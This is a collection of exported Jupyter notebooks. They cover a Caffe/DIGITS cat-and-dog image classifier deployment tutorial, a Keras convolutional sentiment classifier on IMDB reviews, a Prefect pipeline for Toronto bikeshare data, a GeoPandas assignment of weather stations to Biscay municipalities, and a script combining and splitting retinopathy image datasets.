While this is the image we have, it is not the 'input' the network expects. To prepare data for inference, we're going to follow one golden rule:Whatever was done prior to training must be done prior to inferenceIn the last section, you saw the files that were generated when DIGITS trained your model. In this section, we'll examine the files generated when DIGITS created your dataset.The job directory for the **dataset** you just trained from is found by selecting the dataset from the model page "Dogs and Cats" and/or if you select the dataset under DIGITS' "dataset" tab. It's in the same place it was for the model, but should be a different number.Replace FIXME with it and execute the code below to set DATA_JOB_DIR to the right filepath and examine what's inside:
###Code
DATA_JOB_DIR = '##FIXME##' ## Remember to set this to be the job directory for your model
!ls $DATA_JOB_DIR
###Output
_____no_output_____
###Markdown
Again, there is more information here than you need (for now). There is an infinite amount that you *could* know about data science and data prep which will become clear as you work through a variety of deep learning problems. In this case, DIGITS did two steps prior to training. We call this *preprocessing.*1) DIGITS resized the images to 256X256 color images
###Code
import cv2
input_image=cv2.resize(input_image, (256, 256), 0,0)
plt.imshow(input_image)
plt.show()
###Output
_____no_output_____
###Markdown
2) DIGITS *normalized* the images by subtracting the mean image from each image to reduce the computation necessary to train. Load the mean image and subtract it from the test image below:
###Code
mean_image = caffe.io.load_image(DATA_JOB_DIR+'/mean.jpg')
ready_image = input_image-mean_image
###Output
_____no_output_____
###Markdown
We've now taken data as it was and converted it into data that our network expects. Next, let's see what output our network creates. Forward Propagation: Using your modelThis is what we care about. Let's take a look at the function: prediction = net.predict([grid_square]).Like any [function](https://www.khanacademy.org/computing/computer-programming/programmingfunctions), net.predict passes an input, ready_image, and returns an output, prediction. Unlike other functions, this function isn't following a list of steps, instead, it's performing layer after layer of matrix math to transform an image into a vector of probabilities. Run the cell below to see the prediction from labeled the labeled data above.
###Code
# make prediction
prediction = net.predict([ready_image])
print prediction
###Output
_____no_output_____
###Markdown
Interesting, but doesn't contain all that much information. Our network took a normalized 256x256 color image and generated a vector of length 2. Generating a useful output: PostprocessingAt this point, we can really build whatever we want. Your only limit is your programming experience. Before getting creative, let's build something basic. This code will determine whether our network output a higher value for the likelihood of "dog" than it did for "cat." If so, it will display an image that would be appropriate if a dog approached our simulated doggy door. If not, the image represents what we'd want to happen if our network determined a cat was at the door.
###Code
print("Input image:")
plt.imshow(input_image)
plt.show()
print("Output:")
if prediction.argmax()==0:
print "Sorry cat:( https://media.giphy.com/media/jb8aFEQk3tADS/giphy.gif"
else:
print "Welcome dog! https://www.flickr.com/photos/aidras/5379402670"
###Output
_____no_output_____
###Markdown
Here, now is everything in one place so you can test with an image that a doggy door might see.
###Code
##Create an input our network expects
input_image= caffe.io.load_image('/dli/data/fromnest.PNG')
input_image=cv2.resize(input_image, (256, 256), 0,0)
ready_image = input_image-mean_image
##Treat our network as a function that takes an input and generates an output
prediction = net.predict([ready_image])
print("Input Image:")
plt.imshow(input_image)
plt.show()
print(prediction)
##Create a useful output
print("Output:")
if prediction.argmax()==0:
print "Sorry cat:( https://media.giphy.com/media/jb8aFEQk3tADS/giphy.gif"
else:
print "Welcome dog! https://www.flickr.com/photos/aidras/5379402670"
###Output
_____no_output_____
###Markdown
Essentially, we've created a simulator for our doggy door challenge. We've created an application that takes an input from a camera, converts it to a data type our network expects, generates an output, and then converts that output into something useful to a user. You could see how you might easily have a positive output control a motor in a doggy door. With regards to deep learning, you have what you need! To see what other images you can try in the code block above, list the test images (images that weren't used for training) can be found by running the command below. Expect some of these images to output the wrong classification. Test them until you're satisfied and then continue in the course to find out how to improve performance!
###Code
!ls /dli/data/dogscats/test
###Output
_____no_output_____
###Markdown
Putting it all togetherLet's put this deployment process together to see how it might look outside of this Jupyter notebook. In the Python file at [pythondeployment.py](../../../../edit/tasks/task3/task/pythondeployment.py), you'll see the same code as above, but consolidated into one file. You'll use this approach during your end of course assessment, so take a look. Insert the filepath to a test image here to visualize it.
###Code
TEST_IMAGE = '/dli/data/dogscats/test/1.jpg'
display= caffe.io.load_image(TEST_IMAGE)
plt.imshow(display)
plt.show()
###Output
_____no_output_____
###Markdown
And then run our small python application with that image as input below. Ignore most of the output and scroll to the bottom. (Even errors and warnings are fine.)
###Code
!python pythondeployment.py $TEST_IMAGE 2>/dev/null
###Output
_____no_output_____ |
notebooks/nlp/6_conv_net_sentiment_classifier_for_imdb.ipynb | ###Markdown
Convolutional Net for Sentiment Classification This Conv Net performs sentiment analysis on the IMDB review dataset.
###Code
import os
from tensorflow.keras.datasets import imdb
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Flatten, Dropout, Activation
from tensorflow.keras.layers import Layer, Embedding, Conv1D, SpatialDropout1D, GlobalMaxPool1D
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, EarlyStopping
from tensorflow.keras.models import load_model
import sklearn.metrics
from sklearn.metrics import roc_auc_score
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
###Output
_____no_output_____
###Markdown
Set Hyperparameters
###Code
output_dir = 'model_output/conv'
epochs = 3
batch_size = 64
patience = 10
val_split = .3
n_dim = 192
n_unique_words = 8000
max_review_length = 200
pad_type = trunc_type = 'pre'
n_conv = 128
k_conv = 3
n_dense = 256
dropout = 0.5
###Output
_____no_output_____
###Markdown
Load Data
###Code
(X_train, y_train), (X_valid, y_valid) = imdb.load_data(num_words=n_unique_words)
###Output
_____no_output_____
###Markdown
Preprocess Data
###Code
X_train = pad_sequences(X_train, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0)
X_valid = pad_sequences(X_valid, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0)
###Output
_____no_output_____
###Markdown
Design Conv Net Architecture
###Code
model = Sequential()
model.add(Embedding(n_unique_words, n_dim, input_length=max_review_length))
model.add(Conv1D(n_conv, k_conv, activation='relu'))
model.add(GlobalMaxPool1D())
model.add(Dense(n_dense, activation='relu'))
model.add(Dense(n_dense, activation='relu'))
model.add(Dropout(dropout))
model.add(Dense(1, activation='sigmoid'))
model.summary()
###Output
_____no_output_____
###Markdown
Configure the Model
###Code
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
modelCheckpoint = ModelCheckpoint(monitor='val_accuracy', filepath=output_dir + '/imdb-cnn.hdf5', save_best_only=True, mode='max')
earlyStopping = EarlyStopping(monitor='val_accuracy', mode='max', patience=patience)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
###Output
_____no_output_____
###Markdown
TensorBoard
###Code
tensorboard = TensorBoard("../logs/imdb-cnn")
###Output
_____no_output_____
###Markdown
Train the Model
###Code
history = model.fit(X_train, y_train, batch_size=batch_size, epochs=epochs,
verbose=1, validation_split=val_split, callbacks=[modelCheckpoint, earlyStopping, tensorboard])
###Output
_____no_output_____
###Markdown
Evaluate
###Code
model = load_model(output_dir+'/imdb-cnn.hdf5')
y_hat = model.predict_proba(X_valid)
final_loss, final_acc = model.evaluate(X_valid, y_valid, verbose = 2)
print("Final loss: {0:.4f}, final accuracy: {1:.4f}".format(final_loss, final_acc))
plt.hist(y_hat)
_ = plt.axvline(x=0.5, color='orange')
pct_auc = roc_auc_score(y_valid, y_hat) * 100
print('{:0.2f}'.format(pct_auc))
print(np.std(history.history['loss']))
fpr, tpr, _ = sklearn.metrics.roc_curve(y_valid, y_hat)
roc_auc = sklearn.metrics.auc(fpr, tpr)
plt.figure()
lw = 2
plt.plot(fpr, tpr, color='darkorange',
lw=lw, label='ROC curve (area = %0.2f)' % roc_auc)
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver Operating Characteristic')
plt.legend(loc="lower right")
plt.show()
###Output
_____no_output_____ |
v1/notebooks/3_data_pipeline_get_data.ipynb | ###Markdown
Data Pipeline to Get Data
###Code
%load_ext lab_black
%load_ext autoreload
%autoreload 2
import pandas as pd
from prefect import Flow
###Output
_____no_output_____
###Markdown
About Use a data pipeline to assemble the data used in the dashboard. User Inputs
###Code
open_tor_data_url = (
"https://ckan0.cf.opendata.inter.prod-toronto.ca/api/3/action/package_show"
)
trips_data_glob_str = "data/raw/*.csv"
stations_params = {"id": "2b44db0d-eea9-442d-b038-79335368ad5a"}
stations_cols_wanted = [
"station_id",
"name",
"physical_configuration",
"lat",
"lon",
"altitude",
"address",
"capacity",
"physicalkey",
"transitcard",
"creditcard",
"phone",
]
neigh_profile_params = {"id": "6e19a90f-971c-46b3-852c-0c48c436d1fc"}
pt_params = {"id": "7795b45e-e65a-4465-81fc-c36b9dfff169"}
poi_params = {"id": "965247c0-c72e-49b4-bb1a-879cf98e1a32"}
ch_params = {"id": "c7be2ee7-d317-4a28-8cbe-bff1ce116b46"}
neigh_boundary_params = {"id": "4def3f65-2a65-4a4f-83c4-b2a4aed72d46"}
neigh_cols_to_show = [
"AREA_ID",
"AREA_SHORT_CODE",
"AREA_LONG_CODE",
"AREA_NAME",
"Shape__Area",
"Shape__Length",
"LATITUDE",
"AREA_LATITUDE",
"LONGITUDE",
"AREA_LONGITUDE",
"geometry",
]
trips_nan_cols = [
"START_STATION_ID",
"END_STATION_ID",
"START_STATION_NAME",
"END_STATION_NAME",
]
trips_duplicated_cols = ["TRIP_ID", "START_TIME", "END_TIME"]
cols = ["STATION_NAME", "year", "month", "day", "hour"]
# Exporting to staged CSV files
cols_to_export = [
"STATION_NAME",
"YEAR",
"MONTH",
"DAY",
"HOUR",
"USER_TYPE",
"NUM_TRIPS",
"DURATION_MEAN",
"AREA_NAME",
"PHYSICAL_CONFIGURATION",
"CAPACITY",
"PHYSICALKEY",
"TRANSITCARD",
"CREDITCARD",
"PHONE",
"NEIGH_TRANSIT_STOPS",
"NEIGH_COLLEGES_UNIVS",
"NEIGH_CULTURAL_ATTRACTIONS",
"NEIGH_PLACES_OF_INTEREST",
]
nrows_per_staged_csv_file = 350_000
%aimport src.data_pipe_utils
import src.data_pipe_utils as dpu
###Output
/home/elsdes3/Downloads/bikeshare-dash/.tox/build/lib/python3.9/site-packages/geopandas/_compat.py:111: UserWarning: The Shapely GEOS version (3.10.2-CAPI-1.16.0) is incompatible with the GEOS version PyGEOS was compiled with (3.10.0-CAPI-1.16.0). Conversions between both will be slow.
warnings.warn(
###Markdown
Data Pipeline Define Pipeline
###Code
with Flow("My Functional Flow") as flow:
df_stations = dpu.get_bikeshare_stations_metadata(
open_tor_data_url,
stations_params,
stations_cols_wanted,
)
df = dpu.get_bikeshare_trips_data(
trips_data_glob_str,
trips_nan_cols,
trips_duplicated_cols,
)
dfch_essentials = dpu.get_city_cultural_hotspots_data(open_tor_data_url, ch_params)
df_poi = dpu.get_city_points_of_interest_data(open_tor_data_url, poi_params)
gdf = dpu.get_city_neighbourhood_boundary_data(
open_tor_data_url,
neigh_boundary_params,
neigh_cols_to_show,
)
df_pt_slice = dpu.get_city_public_transit_locations_data(
open_tor_data_url, pt_params
)
df_coll_univ = dpu.get_city_college_university_locations_data()
df_neigh_demog = dpu.get_neighbourhood_profile_data(
open_tor_data_url, neigh_profile_params
)
(
df_poi_new,
dfch_essentials_new,
df_coll_univ_new,
df_pt_slice_new,
df_neigh_stats,
df_stations_new,
) = dpu.aggregate_data(
gdf,
df_poi,
dfch_essentials,
df_coll_univ,
df_pt_slice,
df_neigh_demog,
df_stations,
)
df_hour_by_station_merged = dpu.combine_trips_neighbourhood_data(
df, cols, df_stations_new
)
dpu.export_aggregated_data_multiple_csvs(
df_hour_by_station_merged,
cols_to_export,
nrows_per_staged_csv_file,
)
###Output
_____no_output_____
###Markdown
Run Pipeline
###Code
%%time
state = flow.run()
%%time
# print(state.result[gdf].shape)
# display(state.result[gdf].result.describe())
display(state.result[df_neigh_demog].result.describe())
# display(state.result[df_poi_new].result.describe())
# display(state.result[dfch_essentials_new].result.describe())
# display(state.result[df_coll_univ_new].result.describe())
# display(state.result[df_pt_slice_new].result.describe())
with pd.option_context('display.max_columns', 100):
display(state.result[df_neigh_stats].result.describe())
display(state.result[df_stations_new].result.describe())
display(state.result[df_hour_by_station_merged].result.describe())
###Output
_____no_output_____ |
B_Submissions_Kopuru_competition/2021-05-12_submit/batch_OLSyears/workerbee01_HONEYCOMB.ipynb | ###Markdown
Challenge: Assigning Weather Stations to each Municipality **OBJECTIVE: We have 102 weather stations, and each of those stations must be assigned to one of the 112 Biscay Province Municipalities.** Note: a Weather station may share multiple Municipalities**Assumptions:*** We will take the center coordinates of each Municipality as a reference point, because it represents an average central position of the area.* We will use the Mercator projection (EPSG:25830) with coordinates in UTM because: - The client data is already in UTM; - Working in UTM will give distance results in meters directly; - This projection is good for large scale analysis**Note:** For more precision we could use the PlateCarree projection (EPSG:32663), designed specifically to preserve distances on a map.(This task is still pending and we would only see tiny differences in the absolute values, which from a Business perspective we do not require for this exercise). Rational / Engine The idea will be to use GeoPandas to solve this problem where we can use the library methods to calculate distances and iterate over them, thus avoiding to have to go through a very manual process and generate higher accuracy. We need:- 1) A **Geodataframe** with a geometry shapely object for the **Biscay Municipalities** (which we already have from Maps Exploration)- 2) **Geodataframe** with a geometry shapely object for the **Weather Stations** (we only have a CSV file with the weather stations UTM coordinates locations, so we will have to create our own Geodataframe)Start by importing the data. Biscay Province GDF / Shapefile **Load Map from Spain and Basque Country as it might be useful**
###Code
# Municipality shapefile (that we can read as GeoDataFrame) that we have already worked with before to get the maps
biscay_gdf = gpd.read_file('../../../Other_open_data/shapefiles/biscay/geodataframe_biscay_municipalities.shp')
biscay_gdf.rename({"municipali":"municipality","code_munic":"code_municipality"}, axis=1, inplace=True)
'''Add coordinates for center of Municipality and take it takes the average central point of the region
This will be usd as the distance calculator (as recommended by JC)'''
biscay_gdf["UTM_points"] = biscay_gdf.geometry.centroid
#inspection of Biscay GDF
biscay_gdf.info()
###Output
<class 'geopandas.geodataframe.GeoDataFrame'>
RangeIndex: 112 entries, 0 to 111
Data columns (total 4 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 municipality 112 non-null object
1 code_municipality 112 non-null object
2 geometry 112 non-null geometry
3 UTM_points 112 non-null geometry
dtypes: geometry(2), object(2)
memory usage: 3.6+ KB
###Markdown
Weather Stations GDF / Shapefile
###Code
# Load the stations CSV we have from client, we will need to work this into a GeoDataFrame
stations_df = pd.read_csv("../../../Input_open_data/ds05_LOCALIZACION-ESTACIONES-METEOROLOGICAS.csv",sep=";")
#Convert column names to lower case for practical reason
stations_df.columns = stations_df.columns.str.lower()
#Set index as Stations, Station Code and Station type and because it will be useful to get the closest municipality
stations_df.set_index(["estacion","codigo","tipo"], inplace=True)
###Output
_____no_output_____
###Markdown
Now create a new column that will use the Point method from package shapely.geometry
###Code
stations_df["UTM_points"] = [Point(x, y) for x, y in zip(stations_df.xutm, stations_df.yutm)]
###Output
_____no_output_____
###Markdown
Convert it to a Geodataframe so we can make our desired calculations(point distances).
###Code
#Create a GeoDataFrame that can be saved as Shapefile and Inspect it
stations_gdf = gpd.GeoDataFrame(stations_df, crs="EPSG:25830", geometry=stations_df.UTM_points)
stations_gdf.info()
###Output
<class 'geopandas.geodataframe.GeoDataFrame'>
MultiIndex: 102 entries, ('Abetxuko', 'C076', 'A') to ('Zizurkil', 'C029', 'M')
Data columns (total 5 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 xutm 102 non-null int64
1 yutm 102 non-null int64
2 cota (m) 102 non-null int64
3 UTM_points 102 non-null object
4 geometry 102 non-null geometry
dtypes: geometry(1), int64(3), object(1)
memory usage: 14.3+ KB
###Markdown
Quick Data Visualization of Weather Stations vs Municipalities Plot the 2 Geodataframes to get an image of how many Meteo Stations from our dataset we have that are located within the Biscay region.- We can clearly see that most meteo Stations lie outside the Biscay Province- We can confirm that only 30 stations are within the Biscay Province
###Code
# Load Basque Country GDF / Shapefile so we can:
# add texture to the map and it does not plot blank areas for Weather Stations that lie outside Biscay Province
#Load Spain Map GeoDataframe & Set projection to UTM (same as we have in our map exploration)
spain_provinces_gdf = gpd.read_file("../../../Other_open_data/shapefiles/spain/gadm36_ESP_2.shx")
spain_provinces_gdf.to_crs("EPSG:25830",inplace=True)
spain_provinces_gdf.set_crs("EPSG:25830",inplace=True)
# Slice GeoDataframe for Basque Country only
basque_country_gdf = spain_provinces_gdf.loc[spain_provinces_gdf.NAME_1 == "País Vasco",:]
# Slice GeoDataFrame for surrounding regions (it gives nicer maps plots)
surrounding_regions_gdf = spain_provinces_gdf.loc[spain_provinces_gdf.NAME_1.isin(["Cantabria","País Vasco","Castilla y León"]),:]
##############################################################################################################
# Save the sliced GDFs to shapefiles that we can use later if needed for other maps explorations (only used 1)
#basque_country_gdf.to_file("basque_country_UTM", driver='ESRI Shapefile')
#surrounding_regions_gdf.to_file("cantabria_paisvasco_castillayleon_UTM", driver='ESRI Shapefile')
# Create Basemap of Basque Country
ax = basque_country_gdf.plot(figsize=(20, 20), zorder=2, color='gainsboro', edgecolor='#737373')
# Add layer of Spain Map for more texture.
spain_provinces_gdf.plot(zorder=1, color='White', edgecolor='#737373', ax=ax)
# Create base map of Biscay Provinces
biscay_gdf.geometry.plot(zorder=3, color='#ffffd4', edgecolor='#bf5b17', ax=ax)
# Add wasp locations map
stations_gdf.plot(label="Weather Stations location", color='#cc4c02', zorder=4, markersize=45, ax=ax)
# Set legends
ax.legend(loc='best', shadow=True, fontsize='xx-large', markerscale = 2)
# Set axis titles
ax.set_title('Location of Weather Stations within the Basque Country',
pad = 20,
fontdict={'fontsize':25, 'color': '#4873ab'})
ax.set_xlabel('Longitude (UMT)', fontdict={'fontsize':16})
ax.set_ylabel('Latitude (UMT)',fontdict={'fontsize':16})
ax.set_xlim(461500, 605000)
ax.set_ylim(4700900, 4813000)
ax.set_facecolor('#4292c6')
plt.show()
#plt.savefig('weather_stations_map.png')
stations_gdf_clipped = gpd.clip(stations_gdf, biscay_gdf)
# Create base map of Biscay Provinces
ax = biscay_gdf.geometry.plot(figsize=(15, 15), zorder=1, color='#ffffcc', edgecolor='#bf5b17')
# Add wasp locations map
stations_gdf_clipped.plot(label="Weather Stations location", color='red', zorder=5, markersize=20, ax=ax)
# Set axis titles
ax.set_title('Weather Stations in the Biscay Province (YTD)',
pad = 20,
fontdict={'fontsize':20, 'color': '#4873ab'})
ax.set_xlabel('Longitude (UMT)')
ax.set_ylabel('Latitude (UMT)')
plt.show()
###Output
_____no_output_____
###Markdown
The Actual Python Script Template to Assign Weather Stations Now that we have both GeoDataFrames we need to calculate the distance points using the .distance() method. We test it for the 1st Municipality in the Biscay geoDataFrame.1 ) For the first Municipality (Gordexola) in the Biscay Municipality GeoDataFrame (the 0 index position),2 ) We calculate the distances between all stations and find the Station index with the lowest value.
###Code
stations_gdf.distance(biscay_gdf.loc[0, "UTM_points"])
# From the output we confirm that it creates a series with distances for all stations for Gordexola (0 based index) municipality
biscay_gordexola = stations_gdf.distance(biscay_gdf.loc[0, "UTM_points"]).idxmin()
biscay_gordexola
#From the series we select the one with the minimum distance.
#The output shows that the closest station for Gordexola is Soudpe-Herrerias.
###Output
_____no_output_____
###Markdown
- **Now that we have the formula for 1 Municipality, we want to iterate through all municipalities so we don't have to go 1 by 1 though all 112.**- **We create a For Loop that will give the minimum distances for all Municipalities.**
###Code
'''Create a for loop to iterate through each Minicipality.
The loop is calculating:
1) the distance of each station for i0(Gordexola) and giving the index of the station where the distance is minimized,
2) then the distance of each station for i1(Gexto) and giving the index of the station where the distance is minimized
3) etc... until it reaches the end of the Municipality GeoDataFrame which has 1 unique Municipality as an Index'''
closest_stations_list = []
for i in biscay_gdf.UTM_points:
closest_stations_list.append(stations_gdf.geometry.distance(i).idxmin())
'''
IDEA TO CORRECT WEATHER STATIONS WITH MISSING VALUES:
closest_stations_list = []
for i in biscay_gdf.UTM_points:
closest_station_i = stations_gdf.geometry.distance(i).nsmallest(n=2,keep="first").index
if closest_station_i[0][1] not in WBds02_METEO.csv.station_code.values: #######confirm/check this line
closest_stations_list.append(closest_station_i[1])
else:
closest_stations_list.append(closest_station_i[0])
'''
# Create a new series with the new list
closest_stations_series = pd.Series(closest_stations_list,name="closest_station")
# Add the newly created Series as a new column for each Municipality showing the closest station
biscay_gdf["closest_station"] = closest_stations_series
# Manually replace the station that does not exist in WBds02_METEO.csv
# first find the index for the Municipality to assign a new station
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Zaratamo"),"UTM_points"])
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Basauri"),"UTM_points"])
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Galdakao"),"UTM_points"])
# then extract the 2nd closest weather station
biscay_zaratamo_48097 = stations_gdf.distance(biscay_gdf.loc[97, "UTM_points"]).nsmallest(n=2).index[1]
biscay_basauri_48015 = stations_gdf.distance(biscay_gdf.loc[23, "UTM_points"]).nsmallest(n=2).index[1]
biscay_galdakao_48036 = stations_gdf.distance(biscay_gdf.loc[41, "UTM_points"]).nsmallest(n=2).index[1]
# then replace the value in the DataFrame to later save as a .csv file
biscay_gdf.at[97,"closest_station"] = biscay_zaratamo_48097
biscay_gdf.at[23,"closest_station"] = biscay_basauri_48015
biscay_gdf.at[41,"closest_station"] = biscay_galdakao_48036
###Output
97 POINT (510759.931 4783835.490)
Name: UTM_points, dtype: geometry
23 POINT (509085.637 4786507.059)
Name: UTM_points, dtype: geometry
41 POINT (513424.801 4786444.656)
Name: UTM_points, dtype: geometry
###Markdown
Use the same code to add a new column with the distance (for checking purposes).
###Code
#Here the loop is calculating for each Municipality the distance of stations and giving the minimum distance only
distance_stations_list = []
for i in biscay_gdf.UTM_points:
distance_stations_list.append(round(stations_gdf.geometry.distance(i).min(),0))
'''
Need to check how to get min distance, maybe using the "closest station" column created previously and finding it
in the stations_gdf
'''
# Create a new series with the new list
distance_stations_series = pd.Series(distance_stations_list,name="station_distance(meters)")
# The newly created Series as a new column for each Municipality showing the closest station
biscay_gdf["station_distance(meters)"] = distance_stations_series.astype(int)
# Manually replace the station that does not exist in WBds02_METEO.csv
# first find the index for the Municipality to assign a new station
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Zaratamo"),"UTM_points"])
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Basauri"),"UTM_points"])
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Galdakao"),"UTM_points"])
# then extract the 2nd closest weather station
biscay_zaratamo_48097_dis = round(stations_gdf.distance(biscay_gdf.loc[97, "UTM_points"]).nsmallest(n=2)[1],0)
biscay_basauri_48015_dis = round(stations_gdf.distance(biscay_gdf.loc[23, "UTM_points"]).nsmallest(n=2)[1],0)
biscay_galdakao_48036_dis = round(stations_gdf.distance(biscay_gdf.loc[41, "UTM_points"]).nsmallest(n=2)[1],0)
# then replace the value in the DataFrame to later save as a .csv file
biscay_gdf.at[97,"station_distance(meters)"] = biscay_zaratamo_48097_dis
biscay_gdf.at[23,"station_distance(meters)"] = biscay_basauri_48015_dis
biscay_gdf.at[41,"station_distance(meters)"] = biscay_galdakao_48036_dis
###Output
97 POINT (510759.931 4783835.490)
Name: UTM_points, dtype: geometry
23 POINT (509085.637 4786507.059)
Name: UTM_points, dtype: geometry
41 POINT (513424.801 4786444.656)
Name: UTM_points, dtype: geometry
###Markdown
Use the same code to add a new series with the number of stations that lie within each Municipality, using the .within() method.
###Code
#Here the loop is calculating for each Municipality the sum of stations that are within the Municipality
number_stations_list = []
for i in biscay_gdf.geometry:
number_stations_list.append(stations_gdf.geometry.within(i).sum())
# Create a new series with the new list
number_stations_series = pd.Series(number_stations_list,name="number_stations")
# The newly created Series as a new column for each Municipality showing the closest station
biscay_gdf["number_of_stations"] = number_stations_series
###Output
_____no_output_____
###Markdown
Use the same code to add a new series with the coordinates of closest stations for each Municipality in order to map them and be able to check if the distances calculated seem correct.
###Code
closest_stations_coords_list = []
for i in biscay_gdf.UTM_points:
closest_stations_coords_list.append(stations_gdf.loc[stations_gdf.geometry.distance(i).idxmin(),"geometry"])
# Create a new series with the new list
closest_stations_coords_series = gpd.GeoSeries(closest_stations_coords_list)
# The newly created Series as a new column for each Municipality showing the closest station
biscay_gdf["closest_station_UTM"] = closest_stations_coords_series
# Manually replace the station that does not exist in WBds02_METEO.csv
# first find the index for the Municipality to assign a new station
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Zaratamo"),"UTM_points"])
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Basauri"),"UTM_points"])
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Galdakao"),"UTM_points"])
# then extract the 2nd closest weather station
biscay_zaratamo_48097_point = stations_gdf.loc[stations_gdf.distance(biscay_gdf.loc[97, "UTM_points"]).nsmallest(n=2).index,"geometry"].iloc[1]
biscay_basauri_48015_point = stations_gdf.loc[stations_gdf.distance(biscay_gdf.loc[23, "UTM_points"]).nsmallest(n=2).index,"geometry"].iloc[1]
biscay_galdakao_48036_point = stations_gdf.loc[stations_gdf.distance(biscay_gdf.loc[41, "UTM_points"]).nsmallest(n=2).index,"geometry"].iloc[1]
# then replace the value in the DataFrame to later save as a .csv file
biscay_gdf.at[97,"closest_station_UTM"] = biscay_zaratamo_48097_point
biscay_gdf.at[23,"closest_station_UTM"] = biscay_basauri_48015_point
biscay_gdf.at[41,"closest_station_UTM"] = biscay_galdakao_48036_point
# check if the replaced values for C0B2 look to have worked properly
biscay_gdf.loc[biscay_gdf.code_municipality.isin(["48097","48015","48036"]),:]
###Output
_____no_output_____
###Markdown
Save CSV with new assigned Weather Stations for each MunicipalityFinally, save the csv file to upload to Github and keep the same current format by slicing and adapting current format layot.
###Code
# Save file as CSV to replace WBds01_weather2municipality.csv
# 1st) extract station_code to maintain same format as Github csv
biscay_gdf.closest_station = biscay_gdf.closest_station.apply(str)
station_code = biscay_gdf.closest_station.str.split(", ", n=3, expand=True)
station_code = station_code.iloc[:,1].str.replace("'","")
station_code = pd.Series(station_code, name="station_code")
# insert station_code series in biscay_gdf
biscay_gdf["station_code"] = station_code
# rename municipality code column to maintain same format as csv file
biscay_gdf.rename({"code_municipality":"municip_code"}, axis=1, inplace=True)
# 2nd) create DataFrame that has the same format as the csv file in Github with the new stations assigned to a Municipality
WBds01_weather2municipality = pd.DataFrame(data = biscay_gdf, columns= ["station_code","municip_code"])
WBds01_weather2municipality.sort_values(by="municip_code", ascending=True, inplace=True)
# 3rd) save the new csv file
WBds01_weather2municipality.to_csv("WBds01_GEO.csv", index=False)
###Output
_____no_output_____
###Markdown
Double Check / Spot Mistakes Inspect the newly Created GDF and perform some checks
###Code
biscay_gdf.info()
biscay_gdf
# run this and inspect df in Excel to spot if there are obvious mistakes
#biscay_gdf.to_excel("weather_to_municp.xlsx", index=False)
# if empty, then no municipality assigned to station C0B2 (which is not present in our METEO dataset)
biscay_gdf.loc[biscay_gdf.station_code.str.contains("C0B2"),:]
###Output
_____no_output_____
###Markdown
Plot the Result in a Map - Do a quick check to see if it is working correctly, ploting the distances in a map.- JC suggests to use it for EDA
###Code
#Generate a new GDF with index as Municipalities to be able to groupby
biscay_gdf2 = biscay_gdf.set_index("municipality")
#Get the Closest Stations Geometry Coordinate Points
station_points_gdf = biscay_gdf2.closest_station_UTM
#Get the Municipality's average center Coordinate Points
municipality_points_gdf = biscay_gdf2.UTM_points
#Append in a new Dataframe to then groupby and generate using the Linestrings method
#lines from Municipality center point to the Stations Point
path_df = station_points_gdf.append(municipality_points_gdf)
#Groupby Municipality and Get the LineString to have a path object
path_df = path_df.groupby(by="municipality").apply(list).apply(lambda x: LineString(x)).reset_index()
#Columns is empty so rename it to "geometry"
path_df.rename({0:"geometry"},axis=1,inplace=True)
#Set the geometry column as type Geometry & the CRS to "EPSG:25830" (same as other projections)
path_gdf = gpd.GeoDataFrame(path_df, geometry=path_df.geometry)
path_gdf.crs = "EPSG:25830"
# Set basemaps
ax = biscay_gdf.plot(figsize=(20, 20), zorder=2, color='#ffffd4', edgecolor='#bf5b17')
surrounding_regions_gdf.plot(zorder=1, color='#f7f7f7', edgecolor='#737373', ax=ax)
# Set results plots
path_gdf.plot(label="Path to assigned Weather Station", zorder=2,linestyle='-', linewidth=1, ax=ax)
municipality_points_gdf.plot(label="Municipality Center", color='green',markersize=20, zorder=3, ax=ax)
stations_gdf.plot(label="Weather Stations", color='#cc4c02',markersize=40, zorder=4, ax=ax)
# Set legends
ax.legend(loc='upper left', shadow=True, fontsize='xx-large', markerscale = 2)
# Set axis titles
ax.set_title('Weather Stations assigned to Biscay Municipalities',
pad = 20,
fontdict={'fontsize':25, 'color': '#4873ab'})
ax.set_xlabel('Longitude (UMT)', fontdict={'fontsize':16})
ax.set_ylabel('Latitude (UMT)',fontdict={'fontsize':16})
ax.set_xlim(461500, 550000)
ax.set_ylim(4757000, 4813000)
ax.set_facecolor('#4292c6')
plt.plot()
#plt.savefig("assigned_weather_stations_map.png")
###Output
_____no_output_____ |
dataprep/combine_datasets.ipynb | ###Markdown
Combining Data
###Code
dataset = pd.DataFrame()
dataset['path'] = images1 + '/' + df1['id_code'] + '.' + ext1
dataset['level'] = df1['diagnosis']
dataset.head()
dataset2 = pd.DataFrame()
dataset2['path'] = images2 + '/' + df2['image'] + '.' + ext2
dataset2['level'] = df2['level']
dataset2.head()
dataset = dataset.append(dataset2, ignore_index=True)
dataset['level'].value_counts()
dataset = dataset.sort_values(by='level', ascending=False)
dataset = dataset.head(dataset['level'].value_counts()[1]*2)
dataset['level'].value_counts()
###Output
_____no_output_____
###Markdown
Splitting
###Code
from sklearn.model_selection import train_test_split
train, test = train_test_split(dataset, test_size=0.25)
train.head()
BASE_PATH = "/mnt/Datasets/datasets/"
train.to_csv(os.path.join(BASE_PATH, 'combined_train_split.csv'), index=False)
test.to_csv(os.path.join(BASE_PATH, 'combined_test_split.csv'), index=False)
###Output
_____no_output_____ |
